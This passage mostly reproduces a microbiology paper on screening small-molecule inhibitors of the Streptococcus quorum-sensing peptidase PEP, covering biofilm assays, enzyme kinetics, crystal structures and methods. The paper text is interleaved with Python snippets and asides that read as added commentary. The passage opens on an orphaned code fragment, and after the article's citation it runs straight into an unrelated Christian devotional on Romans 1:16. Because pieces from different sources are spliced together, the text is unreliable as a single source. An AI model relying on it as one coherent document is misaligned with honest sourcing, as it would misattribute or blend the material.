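pos = [100.2, 99.8, 100.5, 99.5]
neg = [1.1, 0.9, 1.0, 1.0]
print(round(z_prime(pos, neg), 2))  # → 0.98
```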
To check both the cell permeability and in vivo activity, these compounds were further subjected to a third screening that examined inhibition against S. mutans biofilm formation. Some compounds inhibited biofilm formation but also showed antimicrobial toxicity to S. mutans, which indicated some non-specific in vivo activities. Finally, six compounds were found to inhibit biofilm formation without inhibiting cell growth. Two of the six compounds were quinuclidine derivatives, and the other four compounds had no primary chemical structure in common.
Effects of Compound 1 on the Quorum-sensing Pathway
To validate the outcome of the whole screening process, these compounds and some of their derivatives were (re-)synthesized or purchased, and their inhibitory activities against MuPEP1 were evaluated. We found one potent compound that showed an IC50 value of 38 μM (Supplementary Fig. S3), and this compound with a quinuclidine core was designated Compound 1 (see Supplementary Methods for detailed information about the compound). We first examined the S. mutans biofilm formation in the presence of various concentrations of Compound 1 by using the same method as used in the third screening. The biofilm formation was dose-dependently suppressed by Compound 1, with an EC50 value of 5 μM (Fig. 2A). A high background (value of approximately 0.5 for absorbance at 595 nm) of this method would be due to adherent bacteria on the flat bottom of the microtiter plate after overnight standing of the culture. The inhibitory effect was more clearly shown by the standing culture in tilted round-bottom culture tubes (Fig. 2B). Although the biofilm formed in the absence of Compound 1 remained tightly stuck to the wall of the tube after shaking, the biofilm formed in the presence of 25 μM Compound 1 was easily detached and dispersed after gentle swirling. It is noteworthy that Compound 1 did not show antimicrobial activity against S. mutans under this condition (Fig. 2B). 
The effect of Compound 1 on the competence development of S. mutans was also evaluated. The transformation efficiency of S. mutans decreased to 35% in the presence of 10 μM Compound 1 (Fig. 2C). To examine the effect of Compound 1 downstream of the quorum-sensing pathway, the expression levels of two bacteriocin genes, nlmA and nlmC, were estimated by quantitative RT-PCR. These genes are unrelated to biofilm formation or competence development but are well known to be directly regulated by the response regulator ComE21. As shown in Fig. 2D, the relative expression levels of nlmA and nlmC were suppressed to 18% and 23%, respectively, by 25 μM Compound 1. These results showed that Compound 1 was efficiently taken up into the cell, inhibited PEP activity, and effectively perturbed quorum-sensing signaling, which eventually should lead to poor biofilm formation and low transformation efficiency of S. mutans. To assess the inhibition mechanism of Compound 1, kinetic analysis was performed at various concentrations of tCComC-AFC in the presence of 0, 50, and 100 μM Compound 1 (Fig. 2E; the Lineweaver–Burk plot is shown in Supplementary Fig. S4). The data (Vmax decreased, Km was unaffected) demonstrated that Compound 1 non-competitively inhibited MuPEP1, with a Ki value of 38 μM. From these results, we assumed that Compound 1 is an allosteric inhibitor that binds to a site apart from the catalytic center of MuPEP1. To test this idea, we tried to solve the structure of MuPEP1 complexed with Compound 1 by soaking and co-crystallization methods under various conditions, but the diffraction data revealed no bound compound molecule.

Identification and Characterization of the Allosteric Site

Therefore, we prepared another form of MuPEP1 with the four N-terminal residues truncated (tMuPEP1), a form that was found to crystallize in a different space group from that of MuPEP1.
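The kinetic signature described above (Vmax decreases while Km is unchanged) is exactly what the pure non-competitive rate law predicts. A sketch of that rate law, assuming the reported Ki of 38 μM and placeholder values for Vmax and Km (the study's actual kinetic constants are in the cited figures, not reproduced here):

```python
def v_noncompetitive(s, i, vmax=1.0, km=5.0, ki=38.0):
    """Michaelis-Menten rate with a pure non-competitive inhibitor:
    v = Vmax*[S] / ((Km + [S]) * (1 + [I]/Ki))."""
    return vmax * s / ((km + s) * (1 + i / ki))

i = 100.0                                # inhibitor concentration (uM)
v_sat = v_noncompetitive(s=1e6, i=i)     # near-saturating [S]: apparent Vmax
v_at_km = v_noncompetitive(s=5.0, i=i)   # rate at [S] = Km
# The apparent Vmax falls to Vmax/(1 + [I]/Ki), yet the rate at [S] = Km is
# still half of the apparent Vmax: Km is unaffected, matching the
# Lineweaver-Burk analysis in the text.
print(round(v_sat, 3), round(v_at_km, 3))
```

Substrate-competitive inhibition would instead raise the apparent Km and leave Vmax untouched, so this simple model is one way to see why the data point to an allosteric site.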
We also tested several synthetic analogs of Compound 1 and solved the structure of tMuPEP1 in complex with Compound 2 (Fig. 3A) at 3.1 Å resolution (Supplementary Table S1). The electron density of the V-shaped Compound 2 was clearly observed in a pocket composed of a β-strand (Phe63–Lys69), an α-helix (Asp71–Tyr77), a loop (Asn78–Pro83), Ala70, and the side chain of Phe137 (Fig. 3B). The binding is mainly mediated through hydrophobic and van der Waals interactions. A few hydrogen bonds might also contribute, but the interactions cannot be specified at this resolution. Although the physiological function of this relatively hydrophobic pocket (Fig. 3C) is unknown, the residues interacting with Compound 2 are conserved among Streptococcus PEPs (Fig. 3D, dots). In the crystal structure of the original MuPEP1, this pocket is occupied by residues from the adjacent protein molecule, which would explain why the complex structure could not be obtained. The side chain of Arg66 occupies the vacant space of this binding pocket in free tMuPEP1, whereas it is rotated away to avoid steric hindrance with Compound 2 in the tMuPEP1-Compound 2 complex (Fig. 3B). There are no other significant differences in either the overall structure or the catalytic triad residues between the free and complex structures of tMuPEP1. The question now arises as to how the inhibitor modulates the peptidase activity of PEP by binding to this remote site. We previously proposed the structure of an acyl-intermediate model obtained by molecular dynamics simulation based on the crystal structure of MuPEP1 (ref. 18). Interestingly, when the structure of the acyl-intermediate was compared with that of free MuPEP1, the amino acid residues that shifted most markedly were those comprising the binding pocket for Compound 2 (Fig. 4A).
The positions of the Cα atoms of Asp76 and Tyr77 in the loop were shifted by 3.7 Å and 4.4 Å, respectively, and those of Ala139, Pro140, and Gln141 in the C-terminal β-strand were shifted by 2.0 Å, 2.7 Å, and 2.7 Å, respectively. Consequently, the space of this pocket was significantly constricted in the acyl-intermediate model. Superimposition of the acyl-intermediate model and the tMuPEP1-Compound 2 complex structure showed direct collision between the bound inhibitor and some residues lining the pocket (Fig. 4B). Taken together, the following inhibition mechanism is proposed: after substrate binding, PEP catalysis proceeds via an acyl-intermediate-like transition state in which a pocket on the protein surface is compressed. When an inhibitor binds to this pocket, the inhibitor prevents these structural changes and non-competitively inhibits the PEP activity (Fig. 4C). To support this hypothesis, the bulky side chain of an arginine was introduced into this pocket at the position of Ala70 (Fig. 3B), which resulted in the catalytic efficiency decreasing to approximately 1% (the kcat/Km of the wild-type PEP was 69 M−1s−1 and that of the Ala70Arg mutant was 0.73 M−1s−1). The significant effect of the mutation at this remote site implies the importance of the pocket during catalysis. Recently, such "secondary" binding sites have been explored as druggable sites in many proteins by fragment-based drug screening22.

Effects of MuPEP1 Inhibitors on S. pneumoniae PEP, S. oralis PEP, and the Peptidase Domain of S. pneumoniae BlpA

To examine whether Compound 1 inhibits PEPs from other streptococcal species, S. pneumoniae PEP15 and S. oralis PEP17 were chosen, both of which showed moderate homology with MuPEP1 (57% and 59% amino acid sequence identity, respectively). Compound 1 inhibited S. pneumoniae PEP and S. oralis PEP, with IC50 values of 29 μM and 25 μM, respectively (Supplementary Fig. S3).
Additionally, 80% of the 85 compounds selected after the second screening were found to efficiently inhibit PEP from S. pneumoniae (Supplementary Fig. S5). These results support the idea that all PEPs catalyze the reaction through the same catalytic process described above and that development of an inhibitor that is effective against various species of Streptococcus might indeed be possible. BlpA is a ComA-like ABC transporter that is responsible for the processing and secretion of a bacteriocin, BlpC23. BlpC has the Gly–Gly motif at the cleavage site and the four conserved hydrophobic residues in the N-terminal leader region17 (Supplementary Fig. S6). The amino acid residues composing the inhibitor-binding pocket of PEPs are also conserved in the peptidase domain of BlpA (Fig. 3D). Indeed, the peptidase domain of BlpA (67% amino acid identity with MuPEP1) efficiently cleaved the fluorescence-labeled substrate tCComC-AFC (Supplementary Fig. S1), and Compound 1 inhibited the peptidase domain of BlpA, with an IC50 value of 16 μM. These results indicate the possibility that Compound 1 inhibits a wide variety of the peptidase domains of bacterial ComA-like ABC transporters, including those of Streptococcus commensal species, some of which may function in the maintenance of the commensal flora. Thus, it should be noted that this inhibitor might disturb the beneficial effects of the nasopharyngeal commensals when used as a drug.

In this study, we focused on PEP as the target of potential inhibitors of the Streptococcus quorum-sensing pathway, established a reliable high-throughput screening system using a synthetic substrate for PEP, and successfully obtained a compound that was found to allosterically inhibit PEP and suppress the quorum-sensing pathway, which eventually led to attenuated biofilm formation.
Compound 1, albeit with a modest EC50 of 5 μM, could be a candidate molecule for further drug development, and the present results could serve as proof-of-principle for the attempt to develop small-molecule inhibitors of the quorum-sensing system, which can affect multiple clinical conditions but have negligible antimicrobial activity.

Methods

The fluorogenic peptide tCComC-AFC, Ala-Gln-Phe-Pro-Val-Leu-Asn-Glu-Lys-Glu-Leu-Lys-Glu-Val-Leu-Gly-Gly-AFC, was purchased from Scrum (Tokyo, Japan). The chemical compound library consisting of 164,514 compounds was supplied by the Drug Discovery Initiative, University of Tokyo (Tokyo, Japan). The chemically defined medium (CDM) contains 58 mM K2HPO4, 15 mM KH2PO4, 10 mM (NH4)2SO4, 35 mM NaCl, 2 mM MgSO4, 4 mM L-glutamate, 1 mM L-arginine monohydrochloride, 1.3 mM L-cysteine, 0.1 mM L-tryptophan, 0.2% casamino acids (Nippon Pharmaceutical, Tokyo, Japan), 44 mM glucose, and 1× Kao and Michayluk vitamin solution (Sigma-Aldrich, St. Louis, MO). The Streptococcus–E. coli shuttle vector pSET2 (ref. 24) and its host strain, E. coli MC1061, were obtained from the National Agriculture and Food Research Organization and the National BioResource Project (NIG, Japan), respectively.

Plasmid Constructions for Expression of the Peptidase Domains

The expression plasmids for tMuPEP1 were constructed by the PrimeSTAR mutagenesis method (Takara, Otsu, Japan) using the MuPEP1 expression plasmid, pSMuP1, as the template17. The primers used were 5′-ACATATGTATAAGCTAGTACCTCAGATTGATAC-3′ (forward) and 5′-AGCTTATACATATGTATATCTCCTTCTTAAAGT-3′ (reverse). For the Ala70Arg tMuPEP1, the single mutation was introduced into the expression plasmid of tMuPEP1 by using primers 5′-ATCAAGCGTGATATGACGCTTTTTGATTATAAT-3′ (forward) and 5′-CATATCACGCTTGATAGAGCGTGTTTCAAAGCC-3′ (reverse). The nucleotide sequences of the entire coding regions were verified. For the peptidase domain of S.
pneumoniae G54 BlpA, the dsDNA corresponding to the coding region (GenBank CP001015, bases 475628–476077) with NdeI and SalI sites on the 5′ and 3′ terminal ends, respectively, was chemically synthesized and cloned into pEX-A2J1 (Eurofins Genomics K.K., Tokyo, Japan). A His6-tag sequence was attached to the C-terminal end for convenience of purification. The coding DNA was digested with NdeI and SalI and ligated into pET21-b to generate pSPB1.

Protein Expression and Purification

For the high-throughput screening and enzyme assays, MuPEP1, S. pneumoniae PEP, and S. oralis PEP were heterologously expressed in E. coli BL21 (DE3) pLysS and purified as previously described14, 16. Briefly, E. coli cells carrying each expression plasmid were grown and induced with 0.2 mM isopropyl-β-D-thiogalactopyranoside for 2 h at 37 °C for MuPEP1 or for 5 h at 30 °C for S. pneumoniae PEP. The PEPs were purified with His·Bind resin (Novagen, Madison, WI) and dialyzed at 4 °C against a buffer containing 20 mM Tris–HCl, 200 mM ammonium sulfate, and 0.1 mM DTT, pH 7.0. For crystallization, tMuPEP1 was heterologously expressed in E. coli Rosetta™ 2 (DE3) pLysS. E. coli cells carrying the expression plasmid were grown and induced with 0.2 mM isopropyl-β-D-thiogalactopyranoside for 3 h at 37 °C. The tMuPEP1 was purified by the same procedure as that for MuPEP1. The purified protein was dialyzed at 4 °C against a buffer containing 70 mM sodium phosphate and 0.1 mM DTT, pH 7.0. The catalytic activity of tMuPEP1 was identical to that of MuPEP1. The Ala70Arg tMuPEP1 and the peptidase domain of S. pneumoniae BlpA were expressed and purified by the same method.

To establish a rapid and robust enzyme assay, we prepared the fluorogenic peptide tCComC-AFC, which corresponds to the N-terminal leader region (−17 to −1) of ComC from S. cristatus, derivatized with 7-amino-4-(trifluoromethyl)coumarin (AFC) at the C-terminal end.
This region of ComC is necessary and sufficient for the interaction with PEP17. The v/[E] versus [S] plots of the PEP assay for tCComC-AFC fit well to a typical Michaelis–Menten curve, like those for natural substrates15, 17. Thus, this synthetic peptide was used as a functionally relevant substrate. Assays were performed in black flat-bottom 384-well plates (Greiner, 784900) under ambient conditions. All compounds dissolved in DMSO were predispensed on the plate (100 nL/well) at a final concentration of 20 μM, and then aliquots of 5 μL of 0.5 μM MuPEP1 (final concentration) in 50 mM Tris-HCl, 150 mM ammonium sulfate, and 0.02% Triton X-100 were dispensed into each well by using a Multidrop Combi dispenser (Thermo Fisher Scientific, Vantaa, Finland). Reactions were initiated by adding aliquots of 5 μL/well of 10 μM tCComC-AFC (final concentration) in 50 mM Tris-HCl, 150 mM ammonium sulfate, 4% DMSO, and 0.02% Triton X-100 by using the dispenser. These reaction mixtures contained DMSO at a 3% final concentration. Each 384-well plate contained 16 negative control wells (lacking MuPEP1) and 16 positive control wells (100 nL of DMSO replacing 100 nL of compound in DMSO). After a 3-h incubation, the fluorescence intensity of the released AFC was measured by using a microplate reader, PHERAstar (BMG Labtech, Offenburg, Germany), with excitation at 380 nm and emission at 490 nm. The inhibition rate for each compound was calculated as

Inhibition (%) = [1 − (FLc − FLn) / (FLp − FLn)] × 100,

where FLc is the fluorescence intensity of the well containing the tested compound, FLp is the fluorescence intensity of the well containing the positive control, and FLn is the fluorescence intensity of the well containing the negative control.

High-performance Liquid Chromatography Assay

Fifteen microliters of 3.3 mM phosphoric acid was added to 8 μL of the reaction mixtures from the screening.
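The first-screening normalization, in which each compound well's fluorescence is scaled between the positive (uninhibited enzyme) and negative (enzyme-free) controls, can be sketched as follows; the function name and plate readings are made-up illustrations:

```python
def inhibition_percent(fl_compound, fl_positive, fl_negative):
    """Inhibition (%) = [1 - (FLc - FLn) / (FLp - FLn)] * 100.
    fl_positive: uninhibited-enzyme control well; fl_negative: no-enzyme well."""
    return (1 - (fl_compound - fl_negative) / (fl_positive - fl_negative)) * 100

# Hypothetical readings: a half-blocked well sits midway between the controls.
print(inhibition_percent(550, 1000, 100))   # -> 50.0
print(inhibition_percent(1000, 1000, 100))  # -> 0.0
```

Subtracting the no-enzyme baseline from both numerator and denominator removes the substrate's own background fluorescence, so 0% and 100% inhibition correspond exactly to the two control populations on each plate.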
Then, 7.5 μL of those mixtures was loaded onto a YMC Triart C18 reversed-phase column (3.0 × 50 mm, 3-μm particle diameter) (YMC, Kyoto, Japan) connected to an LC2000 high-performance liquid chromatography system equipped with an autosampler (Jasco, Tokyo, Japan), and AFC was separated from the unreacted tCComC-AFC by using a mobile phase consisting of 55% acetonitrile in water with 0.45% formic acid over 2.5 min at a flow rate of 0.5 mL/min at ambient temperature. The fluorescence was detected by using excitation at 360 nm and emission at 470 nm. The inhibition rate for each compound was calculated as

Inhibition (%) = (1 − FLc / FLp) × 100,

where FLc is the fluorescence intensity of the well containing the tested compound, and FLp is the fluorescence intensity of the well containing the positive control.

Determination of IC50 Value in the Second Screening

Dose-dependent inhibitory activities of compounds against MuPEP1 were examined in quadruplicate. Assays were performed under the same conditions used in the first screening except with various concentrations of compound (0.2, 0.6, 2, 6, and 20 μM). An IC50 value for each compound was estimated by linear interpolation between the two tested concentrations bracketing 50% inhibition:

IC50 = Lowconc + [(50 − Lowinh) / (Highinh − Lowinh)] × (Highconc − Lowconc),

where Lowinh (%) is the inhibition directly below 50% inhibition, Highinh (%) is the inhibition directly above 50% inhibition, Lowconc is the corresponding concentration of tested compound directly below 50% inhibition, and Highconc is the corresponding concentration of tested compound directly above 50% inhibition.

Biofilm Formation and Bacterial Growth Assay

An overnight culture of S. mutans strain UA159 (ATCC 700610) in BHI medium was inoculated into 200 μL of CDM per well (3.0 × 10⁶ CFU) of a flat-bottomed 96-well microtiter plate (Corning, 3595). After 18 h of standing incubation at 37 °C in 5% CO2 under anaerobic conditions in an AnaeroPack system (Mitsubishi Gas Chemical, Tokyo, Japan), the culture medium was removed, and adherent bacteria were stained with 200 μL of 0.005% crystal violet for 30 min.
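The bracketing IC50 estimate from the five-point dose series can be sketched as below; linear interpolation between the two flanking concentrations is assumed, and the inhibition values are hypothetical:

```python
def ic50_bracketing(concs, inhibitions):
    """Interpolate linearly between the tested concentration directly below
    (Lowconc/Lowinh) and directly above (Highconc/Highinh) 50 % inhibition."""
    pairs = sorted(zip(concs, inhibitions))
    for (low_c, low_i), (high_c, high_i) in zip(pairs, pairs[1:]):
        if low_i < 50 <= high_i:
            return low_c + (50 - low_i) / (high_i - low_i) * (high_c - low_c)
    return None  # 50 % inhibition was not bracketed by the tested range

# Hypothetical dose-response over the screening concentrations (uM):
print(round(ic50_bracketing([0.2, 0.6, 2, 6, 20], [2, 8, 21, 44, 71]), 1))  # -> 9.1
```

Returning None when 50% inhibition falls outside the tested range mirrors the screening cutoff: only compounds whose interpolated IC50 lands inside the 0.2–20 μM series advanced to the third screening.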
The wells were washed twice with 300 μL of distilled water and then air dried. The dye was extracted into 200 μL of 60% ethanol, and the biofilm mass was estimated by measuring the absorbance at 595 nm with a microplate reader (Model 680XR; Bio-Rad, Hercules, CA). The bacterial growth was determined by measuring the turbidity (absorbance at 595 nm) of parallel wells. For the count of viable cells shown in Fig. 2B, part of the culture was serially diluted and spread onto BHI plates, and the plates were incubated overnight at 37 °C in 5% CO2 under anaerobic conditions.

Four microliters of the overnight culture of S. mutans in BHI medium was inoculated into 0.4 mL of CDM in the absence or presence of 10 µM Compound 1. After 7.5 h of incubation at 37 °C in 5% CO2 under anaerobic conditions in the AnaeroPack system, 1 μg of plasmid pSET2 was added to the culture. After an additional 3 h of growth, the cultures were chilled on ice, and serial dilutions of the cultures were plated onto BHI agar plates (for enumeration of total CFU) and onto BHI agar plates containing 1 mg/mL spectinomycin (for enumeration of transformants). Transformation efficiency was determined after 24–48 h of incubation at 37 °C in 5% CO2 under anaerobic conditions.

Real-time Quantitative RT-PCR

Six microliters of the overnight culture of S. mutans in BHI medium was inoculated into 0.4 mL of CDM. After 17 h of incubation at 37 °C in 5% CO2 under anaerobic conditions in an AnaeroPack system, cells were collected by centrifugation and treated with labiase (Cosmo Bio, Tokyo, Japan), and total RNA was extracted and purified by using a PureLink™ RNA Mini kit (Ambion, Austin, TX). Purified RNA was reverse transcribed to cDNA by using a SuperScript® VILO™ cDNA Synthesis kit. Quantitative real-time PCR was performed by using Power SYBR® Green PCR Master Mix (Applied Biosystems, Foster City, CA) on a StepOnePlus Real-Time PCR system (Applied Biosystems).
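Relative expression from qPCR threshold cycles of this kind is computed with the 2^−ΔΔCT method: the target gene is normalized to the 16S rRNA reference and then to the untreated control sample. A minimal sketch with hypothetical CT values (not the study's data):

```python
def fold_change(ct_target, ct_ref, ct_target_ctrl, ct_ref_ctrl):
    """2^-ddCT: ddCT = (CT_target - CT_ref)_treated - (CT_target - CT_ref)_control."""
    ddct = (ct_target - ct_ref) - (ct_target_ctrl - ct_ref_ctrl)
    return 2 ** -ddct

# Hypothetical cycles: a target gene crossing threshold 2.5 cycles later
# (relative to 16S rRNA) in treated cells than in untreated cells.
print(round(fold_change(24.5, 12.0, 22.0, 12.0), 3))  # -> 0.177
```

A fold change of about 0.18 corresponds to expression suppressed to roughly 18% of the control, the magnitude reported for nlmA in the presence of 25 μM Compound 1.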
The gene expression levels were calculated by using the ΔΔ threshold cycle (ΔΔCT) method25. The 16S rRNA gene of S. mutans was used as the housekeeping reference. The oligonucleotides used to amplify each gene were as follows: 5′-GCTTACCAAGGCGACGATACA-3′ and 5′-GCGTTGCTCGGTCAGACTTTC-3′ for 16S rRNA, 5′-GGACAGCCAAACACTTTCAACTG-3′ and 5′-TTGCCGCGACTGCTTCTC-3′ for nlmA (SMU.150), and 5′-ATGGAATTGTGCAGCAGGTATTG-3′ and 5′-CGCCTGCAGTAGCCATATAAC-3′ for nlmC (SMU.1914C). All experiments using commercially available kits were performed according to the manufacturers' instructions.

The PEP activity was assayed in a 110-μL reaction mixture containing 50 mM Tris-HCl, 150 mM ammonium sulfate, 0.02% Triton X-100, and various concentrations of the substrate. The reaction was started by adding the PEP solution to a final concentration of 0.25–2.0 μM. The reaction was performed at 25 °C; 50 μL of the reaction mixture was transferred to a white 96-well microtiter plate (Thermo Scientific 236105), and the fluorescence intensity was immediately measured by using a GloMax®-Multi Plus Detection System (Promega, Madison, WI) with excitation at 405 nm and emission at 495–505 nm.

Structure Determination and Analysis

tMuPEP1 was crystallized by the sitting-drop vapor diffusion method. The 16.4-mg/mL protein solution was mixed with an equal volume of 100 mM Bis-Tris (pH 5.5) containing 200 mM ammonium sulfate and 25% (w/v) polyethylene glycol 3,350. The drop was equilibrated against 800 μL of the reservoir solution at 20 °C. The obtained crystal was soaked in a 2-μL drop of buffer containing 1 mM Compound 2, 50 mM Bis-Tris (pH 5.5), 100 mM ammonium sulfate, 12.5% (w/v) polyethylene glycol 3,350, and 1% DMSO. After incubation for 1 h at room temperature, the crystal was cryo-cooled without an additional cryoprotectant at −173 °C. The diffraction data were collected at a wavelength of 1.0000 Å by using an MX225HE detector (Rayonix, Evanston, IL) at SPring-8 BL38B1 (Hyogo, Japan).
The diffraction data were processed and scaled by using the HKL2000 program package26. The structure was solved by molecular replacement using the structure of MuPEP1 (PDB 3K8U) as the search model. The program MOLREP27 in the CCP4 suite was used for the rotation and translation searches. The model was refined by using the REFMAC528, COOT29, and PHENIX30 programs. The stereochemistry of the structure was checked by using the program PROCHECK31 in the CCP4 suite. Although two PEP molecules were found to form a dimer in the crystal, this dimer was estimated to be unstable and non-physiological according to the Protein Interfaces, Surfaces and Assemblies (PISA) service32. No electron density was visible for the N-terminal methionine residues of both subunits or for a large part of the C-terminal residues (142–150 of molecule A and 141–150 of molecule B), including the His-tag. In molecule B, 13 residues (26–38) were also invisible. In the structure of the tMuPEP1-Compound 2 complex, Compound 2 was bound only in molecule B. Further details of the crystallographic data and statistics are given in Supplementary Table S1.

References

Meyer, D. H. & Fives-Taylor, P. M. Oral pathogens: from dental plaque to cardiac disease. Curr. Opin. Microbiol. 1, 88–95 (1998).
Vogkou, C. T., Vlachogiannis, N. I., Palaiodimos, L. & Kousoulis, A. A. The causative agents in infective endocarditis: a systematic review comprising 33,214 cases. Eur. J. Clin. Microbiol. Infect. Dis. 35, 1227–1245 (2016).
Costerton, J. W., Stewart, P. S. & Greenberg, E. P. Bacterial biofilms: a common cause of persistent infections. Science 284, 1318–1322 (1999).
Brackman, G. & Coenye, T. Quorum sensing inhibitors as anti-biofilm agents. Curr. Pharm. Des. 21, 5–11 (2015).
Fuqua, W. C., Winans, S. C. & Greenberg, E. P. Quorum sensing in bacteria: the LuxR-LuxI family of cell density-responsive transcriptional regulators. J. Bacteriol. 176, 269–275 (1994).
Hossain, M. S. & Biswas, I. An extracellular protease, SepM, generates functional competence-stimulating peptide in Streptococcus mutans UA159. J. Bacteriol. 194, 5886–5896 (2012).
Cvitkovitch, D. G., Li, Y. H. & Ellen, R. P. Quorum sensing and biofilm formation in streptococcal infections. J. Clin. Invest. 112, 1626–1632 (2003).
Prudhomme, M., Attaiech, L., Sanchez, G., Martin, B. & Claverys, J. P. Antibiotic stress induces genetic transformability in the human pathogen Streptococcus pneumoniae. Science 313, 89–92 (2006).
Heng, N. C. K., Tagg, J. R. & Tompkins, G. R. Competence-dependent bacteriocin production by Streptococcus gordonii DL1 (Challis). J. Bacteriol. 189, 1468–1472 (2007).
Yoshida, A. & Kuramitsu, H. K. Multiple Streptococcus mutans genes are involved in biofilm formation. Appl. Environ. Microbiol. 68, 6283–6291 (2002).
Vidal, J. E., Howery, K. E., Ludewick, H. P., Nava, P. & Klugman, K. P. Quorum-sensing systems LuxS/autoinducer 2 and Com regulate Streptococcus pneumoniae biofilms in a bioreactor with living cultures of human respiratory cells. Infect. Immun. 81, 1341–1353 (2013).
Garcia-Contreras, R., Maeda, T. & Wood, T. K. Can resistance against quorum-sensing interference be selected? ISME J. 10, 4–10 (2016).
Håvarstein, L. S., Diep, D. B. & Nes, I. F. A family of bacteriocin ABC transporters carry out proteolytic processing of their substrates concomitant with export. Mol. Microbiol. 16, 229–240 (1995).
Lin, D. Y., Huang, S. & Chen, J. Crystal structures of a polypeptide processing and secretion transporter. Nature 523, 425–430 (2015).
Ishii, S., Yano, T. & Hayashi, H. Expression and characterization of the peptidase domain of Streptococcus pneumoniae ComA, a bifunctional ATP-binding cassette transporter involved in quorum sensing pathway. J. Biol. Chem. 281, 4726–4731 (2006).
Ishii, S., Yano, T., Okamoto, A., Murakawa, T. & Hayashi, H. Boundary of the nucleotide-binding domain of Streptococcus ComA based on functional and structural analysis. Biochemistry 52, 2545–2555 (2013).
Kotake, Y., Ishii, S., Yano, T., Katsuoka, Y. & Hayashi, H. Substrate recognition mechanism of the peptidase domain of the quorum-sensing-signal-producing ABC transporter ComA from Streptococcus. Biochemistry 47, 2531–2538 (2008).
Ishii, S. et al. Crystal structure of the peptidase domain of Streptococcus ComA, a bifunctional ATP-binding cassette transporter involved in the quorum-sensing pathway. J. Biol. Chem. 285, 10777–10785 (2010).
Zhu, L. & Lau, G. W. Inhibition of competence development, horizontal gene transfer and virulence in Streptococcus pneumoniae by a modified competence stimulating peptide. PLoS Pathog. 7, e1002241 (2011).
Wang, B. & Muir, T. W. Regulation of virulence in Staphylococcus aureus: molecular mechanisms and remaining puzzles. Cell Chem. Biol. 23, 214–224 (2016).
Hung, D. C. et al. Characterization of DNA binding sites of the ComE response regulator from Streptococcus mutans. J. Bacteriol. 193, 3642–3652 (2011).
Ludlow, R. F., Verdonk, M. L., Saini, H. K., Tickle, I. J. & Jhoti, H. Detection of secondary binding sites in proteins using fragment screening. Proc. Natl. Acad. Sci. U.S.A. 112, 15910–15915 (2015).
Wholey, W. Y., Kochan, T. J., Storck, D. N. & Dawid, S. Coordinated bacteriocin expression and competence in Streptococcus pneumoniae contributes to genetic adaptation through neighbor predation. PLoS Pathog. 12, e1005413 (2016).
Takamatsu, D., Osaki, M. & Sekizaki, T. Construction and characterization of Streptococcus suis–Escherichia coli shuttle cloning vectors. Plasmid 45, 101–113 (2001).
Livak, K. J. & Schmittgen, T. D. Analysis of relative gene expression data using real-time quantitative PCR and the 2(−ΔΔCT) method. Methods 25, 402–408 (2001).
Otwinowski, Z. & Minor, W. Processing of X-ray diffraction data collected in oscillation mode. Methods Enzymol. 276, 307–326 (1997).
Vagin, A. & Teplyakov, A. Molecular replacement with MOLREP. Acta Crystallogr. D Biol. Crystallogr. 66, 22–25 (2010).
Murshudov, G. N. et al. REFMAC5 for the refinement of macromolecular crystal structures. Acta Crystallogr. D Biol. Crystallogr. 67, 355–367 (2011).
Emsley, P., Lohkamp, B., Scott, W. G. & Cowtan, K. Features and development of Coot. Acta Crystallogr. D Biol. Crystallogr. 66, 486–501 (2010).
Adams, P. D. et al. PHENIX: a comprehensive Python-based system for macromolecular structure solution. Acta Crystallogr. D Biol. Crystallogr. 66, 213–221 (2010).
Laskowski, R. A., MacArthur, M. W., Moss, D. S. & Thornton, J. M. PROCHECK: a program to check the stereochemical quality of protein structures. J. Appl. Crystallogr. 26, 283–291 (1993).
Krissinel, E. & Henrick, K. Detection of protein assemblies in crystals. In Computational Life Sciences, pp. 163–174 (Springer, 2005).
Pettit, F. K., Bare, E., Tsai, A. & Bowie, J. U. HotPatch: a statistical approach to finding biologically relevant features on protein surfaces. J. Mol. Biol. 369, 863–879 (2007).

Acknowledgements

The crystallographic experiments were performed at BL38B1 in SPring-8 (Proposals 2015A1065 and 2015B2065). We thank T. Murakawa and the BL38B1 beamline staff at SPring-8 for help with structural analysis, H. Nakano and I. Minegishi for help with high-throughput screening analysis, C. Koda for help with compound management, and R. Nagae and H. Hori for technical assistance. This research was partially supported by the Platform Project for Supporting Drug Discovery and Life Science Research (Platform for Drug Discovery, Informatics, and Structural Life Science) from the Ministry of Education, Culture, Sports, Science, and Technology (MEXT) and the Japan Agency for Medical Research and Development (AMED). The authors would like to thank Enago (www.enago.jp) for the English language review. The authors declare that they have no competing interests.
Accession codes: The crystal structures of the tMuPEP1-Compound 2 complex and free tMuPEP1 have been deposited in the Protein Data Bank under accession codes 5XE9 and 5XE8, respectively. Publisher's note: Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.

Cite this article: Ishii, S., Fukui, K., Yokoshima, S. et al. High-throughput Screening of Small Molecule Inhibitors of the Streptococcus Quorum-sensing Signal Pathway. Sci Rep 7, 4029 (2017). https://doi.org/10.1038/s41598-017-03567-2
Romans 1:16, "I am not ashamed of the gospel, because it is the power of God for the salvation of everyone who believes: first for the Jew, then for the Gentile."

Paul in the above verse gives the promise that everyone who believes in the Gospel receives salvation. You are a part of "everyone"; therefore, if you believe in the Gospel you are saved. Thus, you have a great promise of salvation today no matter what you are facing in life. The Gospel is the "good news" about Jesus' death, burial, and resurrection from the dead to be the "once and for all" sacrifice for all of mankind's sins. Salvation simply means "to be saved from Satan's power, your sin, and physical death."

First, because of Jesus you are saved from the power of the devil. You are no longer forced to be his slave and to live in fear of his lies, because Jesus defeated the devil for you, 1 John 3:8! Second, you are saved from your own sin. Sin no longer has a presence, power, or penalty in your life. You have been washed clean and made new; thus you are saved from sin to be righteous and holy, 1 John 3:9. Lastly, Jesus saved you from physical death. Though your body may die, Jesus promises to raise it up in the last days to be an immortal, indestructible body, 1 Corinthians 15:53. As a result, death no longer has a sting for you, because you are going to live forever in bliss with Jesus upon the new earth. Therefore, put your full trust in Jesus as your "Savior" and don't be ashamed of the Gospel, because it is God's promise of salvation for you and all who believe it!

- Examine your heart to see if you have "assurance" of being saved.
- If you lack assurance, search your heart to see if you are in sin and repent. If you have assurance, praise God for His wonderful saving work in your life.
- Share the Gospel, God's promise of salvation, with someone today!
